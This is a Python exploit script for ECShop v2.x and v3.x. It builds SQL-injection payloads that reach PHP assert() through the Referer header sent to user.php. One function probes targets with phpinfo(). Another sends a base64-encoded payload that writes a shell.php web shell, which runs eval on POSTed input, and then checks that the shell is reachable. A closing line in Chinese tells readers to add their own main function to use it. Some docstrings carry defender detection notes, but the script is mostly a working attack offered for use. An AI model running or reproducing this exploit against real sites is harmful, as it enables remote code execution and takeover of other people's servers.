ECShop v2/v3 EXP
import requests
import binascii


def get_v2Payload(code):
    '''Ecshop V2.x payload.

    Wraps ``code`` in a PHP fragment that reaches ``assert()`` (the ``@``
    suppresses PHP warnings), hex-encodes it, and embeds the hex inside a
    PHP-serialized string that is framed by the fixed marker
    ``554fcae493e564ee0dc75bdf2ebf94ca`` on both ends.  The ``%s`` before the
    ``union select`` is the serialized-string length field and is computed
    as ``50 + len(shellcode)`` so the serialized structure stays well-formed.
    The caller places the result in the ``Referer`` header (see ``verify``
    and ``getshell``).

    Detection note: the marker hash, the ``ads|a:2:{`` serialized prefix and
    the ``union select`` text are all constant and appear verbatim in the
    request header, which makes them straightforward to match in web-server
    or WAF logs.
    '''
    code = "{$abc'];@assert(%s);//}" %(code)
    # print(code)
    code = code.encode()
    # hexlify() returns bytes; decode() turns it back into str for the format below
    shellcode = binascii.hexlify(code).decode()
    payload = "554fcae493e564ee0dc75bdf2ebf94caads|a:2:{s:3:\"num\";s:%s:\"*/ union select 1,0x27202f2a,3,4,5,6,7,8,0x%s,10-- -\";s:2:\"id\";s:4:\"' /*\";}554fcae493e564ee0dc75bdf2ebf94ca" % ((50 + len(shellcode)),shellcode)
    return payload


def get_v3Payload(code):
    '''Ecshop V3.x payload.

    Same construction as ``get_v2Payload`` with two differences visible in
    the code: the PHP fragment calls ``assert()`` without the ``@`` prefix,
    and the framing marker is ``45ea207d7a2b68c49582d2d22adf953a``.  The
    length field is again ``50 + len(shellcode)``.  The same detection
    note applies: every part of the payload other than the hex blob is a
    fixed string.
    '''
    code = "{$abc'];assert(%s);//}" %(code)
    code = code.encode()
    shellcode = binascii.hexlify(code).decode()
    payload = "45ea207d7a2b68c49582d2d22adf953aads|a:2:{s:3:\"num\";s:%s:\"*/ union select 1,0x27202f2a,3,4,5,6,7,8,0x%s,10-- -\";s:2:\"id\";s:4:\"' /*\";}45ea207d7a2b68c49582d2d22adf953a" % ((50 + len(shellcode)),shellcode)
    return payload


def verify(url):
    '''Probe ``url`` for the issue by sending a ``phpinfo()`` payload.

    Builds both the v2 and v3 payloads, sends each as the ``Referer``
    header of a GET to ``<url>/user.php`` with a 3-second timeout, and
    treats the string ``allow_url_include`` appearing in the response body
    as confirmation.  On the first hit it prints a dict with the probed URL
    and the matching version label, then stops.  Nothing is returned; the
    result is only printed.

    Note: the parameter ``url`` is rebound to the ``/user.php`` form on the
    fourth statement, so the printed ``URL`` is the full endpoint, not the
    base the caller passed in.
    '''
    print(url)
    flag = "allow_url_include"
    code = "phpinfo()"
    url = url + "/user.php"
    ec2payload = get_v2Payload(code)
    # print(ec2payload)
    ec3payload = get_v3Payload(code)
    payloads = [(ec2payload,'2.x'),(ec3payload,'3.x')]
    for payload,version in payloads:
        # The payload is delivered entirely through the Referer header;
        # the request line and body are otherwise an ordinary GET.
        headers = {
            'User-Agent':'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:27.0) Gecko/20100101 Firefox/27.0',
            'Referer':payload
        }
        try:
            rsp = requests.get(url,headers=headers,timeout=3)
            if flag in rsp.text:
                verifyInfo = {}
                verifyInfo['URL'] = url
                verifyInfo['version'] = version
                print(verifyInfo)
                break
        # Bare except: connection errors, timeouts and any other failure are
        # silently dropped, so a host that is simply unreachable is
        # indistinguishable from one that is not affected.
        except:
            pass


def getshell(url):
    '''Send a base64-wrapped PHP payload to ``<url>/user.php`` and then
    GET ``<url>/shell.php``.

    The follow-up request to ``/shell.php`` shows the intent of the
    embedded code: it is expected to write a file with that name on the
    target.  For each of the v2 and v3 payloads the function sends the
    ``Referer``-borne request with a 5-second timeout, and if it returns
    HTTP 200 it requests ``/shell.php``; a 200 there is printed as a dict
    with the shell URL and version label, and the loop stops.  Nothing is
    returned.

    Defender note: a request to ``user.php`` carrying a ``Referer`` that
    begins with one of the two fixed marker hashes, followed shortly by a
    request for ``/shell.php``, is the observable sequence this function
    produces.  ``shell.php`` appearing in the web root is the file-system
    artefact to check for.
    '''
    code = "base64_decode('ZmlsZV9wdXRfY29udGVudHMoJ3NoZWxsLnBocCcsJzw/cGhwIGV2YWwoJF9QT1NUWzc3N10pOyA/Picp')"
    i = url + "/user.php"
    ec2payload = get_v2Payload(code)
    # print(ec2payload)
    ec3payload = get_v3Payload(code)
    payloads = [(ec2payload,'2.x'),(ec3payload,'3.x')]
    for payload,version in payloads:
        headers = {
            'User-Agent':'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:27.0) Gecko/20100101 Firefox/27.0',
            'Referer':payload
        }
        try:
            rsp = requests.get(i,headers=headers,timeout=5)
            # A 200 from user.php is only checked as a status code; the
            # response body is not inspected.
            if rsp.status_code == 200:
                shurl = url + "/shell.php"
                srsp = requests.get(shurl,timeout=5)
                if srsp.status_code == 200:
                    verifyInfo = {}
                    verifyInfo['URL'] = shurl
                    verifyInfo['version'] = version
                    print(verifyInfo)
                    break
        # Bare except: every exception, including network failures, is
        # swallowed without logging.
        except:
            pass
大概就是这么个样子,具体要怎么用自己在添加主函数就行。